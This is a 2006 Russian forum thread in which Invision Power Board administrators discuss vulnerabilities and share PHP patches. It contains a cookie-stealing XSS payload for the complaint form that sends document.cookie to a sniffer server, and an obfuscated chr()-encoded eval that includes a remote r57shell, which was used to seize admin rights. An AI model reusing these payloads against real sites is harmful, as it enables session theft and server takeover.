Уязвимости форумов Invision Power Board

[dfc_darkman]

Ладно, чуть позже почитаю, пока что-то не нашел.

 

dfc_darkman Отправить жалобу админу на сообщение (скажем, содержащее флуд). Туда и вписать код с адресом сниффера (допустим, этого _http://kanick.ру/sniffer).

что за сниффер? где его взять?

[Гость Salavat]

что за сниффер? где его взять?

http://antichat.ru/sniff/

Здесь, например =)

[dfc_darkman]

Ну вот я создал тему на форуме

вставил код этой карттки

 

посмотрел сам тему

потом в лог на античате

мне написло вот что:

 

Wed Apr 26 02:01:46 2006] IP=82.144.206.141 SITE=www.dancegalaxy.net

REFERER=http://www.dancegalaxy.net/forums/index.php?showtopic=6708

QUERY=

AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.54

это значит что всё ок? или как?

[AHTIKILLER]

Ну вот я создал тему на форуме

вставил код этой карттки

 

посмотрел сам тему

потом в лог на античате

мне написло вот что:

<...>

Не-а. В том-то и дело, что при создании темы, а также PM сообщения java-скрипт фильтруется, а вот если жмякнуть кнопку ЖАЛОБА и в форме ввести

<script>img = new Image(); img. src = "http://адрес_сервера/s/s.gif?"+document.cookie;</script>, то через пришедшее админу и модерам письмо в лог (поле QUERY) запишется номер юзверя, хэш пароля, id сессии, которые и идут в дело.

Так вот как сделать фильтрацию скриптов в письмах-рапортах?

 

Кстати, в этом же номере журнала ][ упомянули про уязвимость в скрипте календаря, но ту, вроде бы, уже закрывали.

[Anna]

Подскажите пожалуйста, где написано как закрыть уязвимость с отправкой жалобы в ПМ с использованием хтмл?

[Ashes]

http://www.securitylab.ru/poc/extra/266313.php

 

работоспособен на версиях 1,2 и несколько выше

[AHTIKILLER]

Намудрили...

Когда создаешь тему, сообщение или обычное PM, то тег <script> либо так и отображается (не выполняясь), либо выдается сообщение об ошибке - о невозможности использовать динамические теги. Так, кто знает PHP, как сделать фильтрацию на этот тег? Без него в поле QUERY лога сниффера информация не запишется, потому что не выполнится java-код (он вообще нафиг пользователям не нужен).

[Ashes]

парни так что с сплоитом ? по заверениям секуритилаб касаеться версий <= 2.5

 

http://www.securitylab.ru/poc/266314.php

[.silent]

Аше цу аше

Обновление безопасности в IPB 2.x.x (25.04.06)

[Ashes]

да то понятно, просто я так понимаю, что как говорилось в манифесте по поводу "выполнения произвольного кода PHP" эт не правда, постить постит (новые темы), если зафигачить все это дело в цикл можно и зафлудить форум нафик, воообщем неприятно

[-=MIF=-]

Дополнение к патчу безопасности т 25.04.2006

 

For 2.1.x

 

Открыть /sources/action_public/messenger.php

 

Найти (around line 1429)

 

			$this->msglib->to_by_id = $this->ipsclass->input['from_contact'];

 

Заменить

 

 			$this->msglib->to_by_id = intval( $this->ipsclass->input['from_contact'] );

 

Сохранить и закрыть /sources/action_public/messenger.php

 

For 2.0.x

 

Открыть /sources/messenger.php

 

Найти (around line 1467)

 

 			$this->lib->to_by_id = $ibforums->input['from_contact'];

 

Заменить

 

 			$this->lib->to_by_id = intval( $ibforums->input['from_contact'] );

 

Сохранить и закрыть /sources/messenger.php

[Song]

Предлагаю наши рассуждения по поводу защиты кук перенести в отдельный тред

Ok.

Куки перенесены в тему 28683

[SHiSH]

-=MIF=-

1,3,1 этому подвержена?

[Song]

2SHiSH

 

Нет.

[Samurai]

После того как один товарищ зарегился и создал темку с кодом

 

eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(114). chr(115). chr(116). chr(46). chr(118). chr(111). chr(105). chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); //

 

то изменил как-то свою группу на админскую.

 

Версия форума 2.1.4

 

откуда произошел такой нереальный косяк?

[xRay]

Samurai

Отсюда:

Обновление безопасности в IPB 2.x.x (25.04.06)

И еще погляди в этом же топике на старничку назад

[.silent]

нехилый там шелл, однако...

[freeman85]

01 мая, 2006

http://www.securitylab.ru/vulnerability/266409.php

 

Song сделайте фильтр на слова document.cookies - чето в последнее время все больше и больше "детских" уязвимостей.

 

я думаю люди пожертвую этим слово ради "своей" безопасности.

 

если так нужны слова в мат фильтре пусть изменяют на:

document_cookies ('_' заменить на точку)

прям так как написано.

 

уже сидишь только и думаешь о взломе, никакой личной жизни

[j4ck]

Новая дырка

 

http://secunia.com/advisories/19901/

 

свежачок

где патчить ???

[Dr.Freddy]

Гм. Это они про get_tids в moderate.php? Имеется в виду, что нет проверки на целое число?

 

Можно что-то типа

				 foreach ( $ids as $index_id => $value_id )
			 {
			   $ids[$index_id] = intval($value_id);
			 }

вставить туда после

$ids = explode( ',', $ibforums->input['selectedpids'] );

 

Должна быть функция в движке, кстати.

[cthulhu]

Должна быть функция в движке, кстати.

есть функция $std->clean_int_array, появившаяся после вот этого исправления

 

а в moderate.php есть selectedtids и selectedpids, в описании уязвимости говорится про первое, но, наверное, стоит и оба параметра проверять...

и еще, все-таки, это надо очень "хорошо" модераторов подбирать, чтоб они стали ломать форум...

[Dr.Freddy]

есть функция $std->clean_int_array

Точно.

 

Тогда так: после

$ids = explode( ',', $ibforums->input['selectedtids'] );

и после

$ids = explode( ',', $ibforums->input['selectedpids'] );

добавляем

$ids = $std->clean_int_array( $ids );

[cthulhu]

$ids = $std->clean_int_array( $ids );

еще одно:

эта строка подходит для 2.0.х, а для 2.1.х надо, насколько я понимаю, так:

$ids = $this->ipsclass->clean_int_array( $ids );

[Din2]

для 2.1.5, полностью код приведите пожалуйста.

 

upd: ага, уже ответили, спасибо

Изменено 2 Мая 2006 пользователем Din2

[Dr.Freddy]

Для 2.1.x, видимо, так: после

$ids = explode( ',', $this->ipsclass->input['selectedtids'] );

и после

$ids = explode( ',', $this->ipsclass->input['selectedpids'] );

добавляем

$ids = $this->ipsclass->clean_int_array( $ids );

 

cthulhu, угроза здесь не обязательно в безалаберности админа: могут ломать аккаунт модератора специально для доступа к этой дырке. Модеры, как правило, про криптостойкость паролей мало что знают.